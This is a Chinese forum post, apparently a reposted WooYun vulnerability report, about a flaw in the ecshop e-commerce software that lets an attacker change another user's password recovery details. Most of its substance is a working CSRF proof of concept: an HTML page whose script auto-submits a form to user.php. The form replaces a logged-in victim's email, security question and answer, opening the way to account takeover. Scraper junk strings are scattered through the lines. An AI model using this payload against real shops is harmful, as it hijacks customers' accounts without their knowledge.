找回密码
 立即注册
查看: 2936|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:4 ?; K; R+ g8 l3 `
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
1 J- b* M* g; l0 x: m( p
) [% l( |4 w8 a. [' h1 v# RDemo For:http://www.wooyun.org/bug.php?action=view&id=3953 t& \$ w. {1 T9 M1 _# A5 f* x8 a/ _
5 U3 A. v+ Q9 G8 t
详细说明:- I. K6 |' L0 p: i6 Q% N
利用csrf和xss可以突破官方所说的“障碍”) I9 L4 m# m1 Z, Z) F7 Y
xss版本已经有人说明
0 [" X, r9 N1 C/ j! `+ E# h这里给出csrf版本8 F3 n# i/ ^+ y+ i

0 g! j9 F- i5 T* ?3 \/ F漏洞证明:
) {- w# X; E0 L, n<html>$ r/ G/ W% e0 c6 s, p% I# a
<body>8 A$ A$ H% O. L7 p3 D5 N
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
- f' d6 i  T1 g  ~  q. P<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
4 r: [) ?7 ~+ t! @5 t& X<INPUT TYPE="text" NAME="act" value="act_edit_profile">
4 v6 o$ I: o7 E) C) ^4 w, a<INPUT TYPE="text" NAME="sel_question" value="ecshop">1 i3 b8 Y( V( L# e
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">2 @7 x4 L( V) C$ {2 U
</body># B8 Y* \9 ?1 Q. v  r" {
<script>5 U, p, H- K$ j- G* O
document.forms[0].submit();% I- a9 s9 o" C4 T' O
</script>
) D( p3 `+ L, }' }' X# Y</html>1 L+ g$ u1 d$ M! |7 \
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失- i: T. X3 T# N: f
  ^/ G/ t6 h) E' k; L" d+ y% s! R7 T9 Y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表